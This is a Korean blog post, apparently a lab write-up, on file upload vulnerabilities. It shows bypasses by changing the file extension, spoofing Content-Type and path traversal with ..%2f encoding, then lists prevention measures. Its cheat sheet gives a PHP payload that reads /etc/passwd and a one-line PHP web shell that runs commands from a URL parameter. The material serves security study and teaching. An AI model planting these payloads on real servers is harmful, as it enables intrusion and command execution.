🔎 What is File upload vulnerabilities?

file-upload-vulnerabilities

파일 업로드 취약점은 웹 서버가 사용자가 이름, 유형, 내용 또는 크기와 같은 항목을 충분히 검증하지 않고 파일 시스템에 파일을 업로드 하도록 허용하는 경우입니다.
이에 대한 제한을 적절하게 적용하지 않으면 기본 이미지 업로드 기능을 사용하여 잠재적으로 위험한 악성 파일을 이미지 파일 대신 업로드 할 수 있습니다.

Lab

파일명 변경

스크린샷 2022-05-29 오후 3 43 51

파일명을 .jpeg에서 .php로 변경 후 php 코드 작성

// 해당 경로의 파일 읽기
<?php echo file_get_contents('/etc/passwd'); ?>

스크린샷 2022-05-29 오후 3 44 41

Content-type 변경

스크린샷 2022-05-29 오후 8 52 19

Content-type 이 image/jpeg 와 image/png 만 허용되어 있음
Content-Type을 text/php 에서 image/jpeg로 변경하여 전송

스크린샷 2022-05-29 오후 8 53 40

스크린샷 2022-05-29 오후 8 54 21

..%2f 사용 경로우회

PHP파일 업로드 시 필터링 없이 PHP파일이 업로드 가능한것을 확인
단, 업로드 파일 접속 시 코드가 실행되지 않고 텍스트 형식으로 반환

스크린샷 2022-05-29 오후 9 31 58

directory traversal을 통해 ../ 공격 시도
그러나 서버에서 ../ 을 필터링하여 삭제처리

스크린샷 2022-05-29 오후 9 33 01

인코딩을 사용하여 ..%2f을 이용하여 업로드 시도
필터링을 거치지 않고 정상적으로 경로 우회하여 업로드가 된것을 확인
업로드 된 경로로 접속시 PHP코드가 실행됨

스크린샷 2022-05-29 오후 9 33 52

🍁 Cheat sheet

PHP Code

// 해당 경로의 파일 읽기
<?php echo file_get_contents('/etc/passwd'); ?>

// cmd 쉘 (exploit.php?command=id)
<?php echo system($_GET['command']); ?>

👀 How to Prevent ?

.jpg, .gif, .pptx 등 수용 가능한 확장자만 업로드 허용 (화이트 리스트 방식)
Contnet-Type 확인을 통한 실행파일 업로드 차단
파일명에 특수문자(../, ..\, %, %00 등)가 포함된 팡리의 업로드를 차단하는 로직 구현
파일확장자 검증 프로세스를 Client side가 아닌 Server side에서 구현
업로드 된 파일이 서버상에서 실행 불가능 하도록 업로드 파일 및 디렉터리의 실행 권한 제거

📃 References

Portswigger File uploads

File Uploads vulnerabilities

🔎 What is File upload vulnerabilities?

Lab

🍁 Cheat sheet

PHP Code

👀 How to Prevent ?

📃 References

Apktool AppGuard 디컴파일 오류 해결

Cloud 기본 지식

IP 대역 분할 표

Bypass NAC

AWS Cheat Sheet

Latest Posts

Web3 자료 모음

토큰기반 인증에서 bearer 란?

File Uploads vulnerabilities

🔎 What is File upload vulnerabilities?

Lab

🍁 Cheat sheet

PHP Code

👀 How to Prevent ?

📃 References

Apktool AppGuard 디컴파일 오류 해결

Cloud 기본 지식

You may also like

IP 대역 분할 표

Bypass NAC

AWS Cheat Sheet

Latest Posts

Web3 자료 모음

토큰기반 인증에서 bearer 란?

Explore Tags